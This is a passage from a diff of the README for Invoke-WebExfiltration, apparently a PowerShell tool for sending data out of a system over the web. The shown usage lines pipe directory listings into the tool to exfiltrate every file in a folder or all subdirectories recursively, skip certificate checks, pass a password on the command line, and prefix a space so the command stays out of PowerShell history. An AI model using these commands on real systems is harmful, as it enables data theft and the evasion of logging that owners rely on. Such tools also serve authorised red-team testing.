PhilippRieth/Invoke-WebExfiltration/README.md

 # Exfiltrate all files in current folder
 ls | IWE

+# Exfiltrate all files in current folder and ignore certificate errors
+ls | IWE -Insecure

 # Exfiltrate all files in curent dir starting with
 ls file* | IWE

 # Exfiltrate all files and sub directories
 ls -Recurse * | IWE

+# Define exfiltration password via parameter (not so secure but okay)
+# Add space before command to prevent it from being save in the PowerShell histroy
+ls file.txt | IWE -Verbose -Password Y84f2hFiAShv3Juw
 ```

 ## Load & use `IWE` with proxy